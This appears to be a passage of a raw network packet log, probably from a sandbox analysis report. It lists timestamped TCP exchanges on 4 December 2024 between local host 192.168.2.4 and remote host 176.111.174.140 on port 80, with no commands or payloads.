                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.712632895 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.712724924 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.713603020 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.713720083 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.713809967 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.714699984 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.714932919 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.715032101 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.715859890 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.715909004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.716109991 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.717031002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.717150927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.717236042 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.718208075 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.718225956 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.718332052 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.719171047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.719346046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.719434977 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.720331907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.720436096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.720535994 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.721421003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.721554041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.721640110 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.722578049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.722714901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.722822905 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.723661900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.723824024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.723925114 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.724781990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.724929094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.725023985 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.725912094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.725990057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.726079941 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.727107048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.727195978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.727381945 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.728210926 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.728343964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.728435040 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.729278088 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.729387999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.729496002 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.730429888 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.730559111 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.730741024 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.731515884 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.731657028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.731751919 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.732664108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.732868910 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.732964993 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.733769894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.733846903 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.733946085 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.734829903 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.735040903 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.735136032 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.735944986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.736078024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.736171007 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.737212896 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.737230062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.737323999 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.738188028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.738329887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.738425016 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.739361048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.739454031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.739550114 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.740493059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.740608931 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.740705013 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.741637945 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.741755962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.741848946 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.742712975 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.742799997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.742897034 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.743809938 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.743876934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.744007111 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.744870901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.803505898 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.878995895 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.879102945 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.879292011 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.879345894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.879509926 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.879597902 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.880531073 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.880793095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.881511927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.881613970 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.881769896 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.881861925 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.882721901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.882827044 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.882985115 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.883709908 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.883852005 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.883970022 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.884824038 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.884922028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.885025024 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.886137009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.886234999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.886322021 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.887115955 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.887331963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.887427092 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.888160944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.888205051 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.888365984 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.889343977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.889481068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.889668941 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.890443087 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.890572071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.890669107 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.891655922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.891787052 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.891979933 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.892657042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.892767906 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.892898083 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.893933058 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.894013882 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.894123077 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.894989967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.895271063 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.895358086 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.896231890 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.896430016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.896516085 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.897476912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.897587061 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.897686005 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.898335934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.898499966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.898741007 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.899616957 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.899748087 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.899835110 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.900532961 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.900753975 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.900837898 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.901613951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.901794910 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.901889086 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.903067112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.903132915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.903222084 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.903954029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.904386997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.904483080 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.905057907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.905137062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.905292034 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.906483889 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.906642914 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.906770945 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.907250881 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.907305956 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.907608032 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.908641100 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.908850908 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.909740925 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.909845114 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.909887075 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.909996986 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.911451101 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.911520004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.911865950 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.911906958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.911997080 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.912992001 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.913149118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.913250923 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.914026976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.914200068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.914313078 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.916801929 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.916815042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.916826963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.916924953 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.916991949 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.917196035 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.917351961 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.917583942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.917783976 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.918395042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.918488026 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.918715000 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.919684887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.919893980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.919986010 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.920778036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.920869112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.920970917 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.921827078 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.922044992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.922166109 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.922911882 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.923259020 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.923361063 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.924124002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.924402952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.924508095 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.925488949 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.925570011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.925676107 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.926362038 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.926417112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.926649094 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.927431107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.927560091 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.928160906 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.928533077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.928978920 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.929071903 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.929584980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.929754019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.929941893 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.930718899 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.930788994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.931037903 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.931886911 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.932418108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.932512045 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.932952881 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.933047056 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.933152914 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.934185028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.934494972 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.934592962 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.935652971 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.935992956 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.936094046 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.936703920 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.936856985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.936953068 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.937531948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:34.990962982 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.071094990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.071154118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.071269989 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.071587086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.071707010 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.072033882 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.072765112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.072786093 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.072997093 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.073869944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.073962927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.074105978 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.075004101 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.075166941 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.075299025 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.076056004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.076282024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.076394081 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.077210903 CET8049738176.111.174.140192.168.2.4
